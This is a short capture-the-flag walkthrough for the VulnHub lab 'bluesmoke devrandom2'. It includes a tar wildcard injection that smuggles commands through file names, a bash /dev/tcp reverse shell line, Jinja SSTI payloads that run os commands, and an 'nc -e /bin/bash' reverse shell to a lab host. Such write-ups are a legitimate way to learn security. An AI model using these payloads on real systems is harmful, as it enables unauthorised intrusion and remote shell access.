https://www.vulnhub.com/entry/bluesmoke-devrandom2,678/
Nmap scan ports.
nmap -sV -sC -p- -oN ports.log 192.168.56.100
Check port 80, it's a backup system.
We can only upload .zip or .tar files. And tar has wildcrad vulnerability. We create 3 files and pack them in a tar file.
echo '' > --checkpoint=1 echo '' > '--checkpoint-action=exec=sh p.sh' echo "/bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.56.150/1234 0>&1'" > p.sh tar -cvf p.tar ./--checkpoint=1 ./--checkpoint-action=exec=sh\ p.sh ./p.sh
Then we upload p.tar, and listen as port 1234. About 1 minute later, we get reverse shell.
Then we can upload id_rsa.pub and get ssh login.
Upload pspy64 and run, wait longer.
We found 'grep -q 1 /tmp/start', looks like a signal.
Create a file named "start" in /tmp, with content "1". Then run pspy64 again. Wait and wait.
echo 1 > /tmp/start
A new service is running. Let's check port again, a new port is open at port 8787.
Port forword 8787 with ssh. Check service.
ssh -L 8787:127.0.0.1:8787 backupper@192.168.56.98
Use wfuzz to check if the site has some variables.
wfuzz -u 'http://127.0.0.1:8787/?FUZZ=id' -w /usr/share/seclists/Discovery/Web-Content/common.txt --hh 21
The value of "name" will be displayed.
And it has SSTI vulnerability.
Let's check a longer SSTI code.
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('id').read()") }}{% endif %}{% endfor %}
Now we can get reverse shell as remnie.
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').system('nc 192.168.56.150 2234 -e /bin/bash')") }}{% endif %}{% endfor %}
Then in /home/remnie/scripts, find a strange server.conf.
Copy the encrypted content into CyberChef and select:
Form Hexdump --> Find/Replace (space to '') -->From Binary --> From Hex --> From Base32 --> From Base64
Then we get root credentials.
Finally we got root.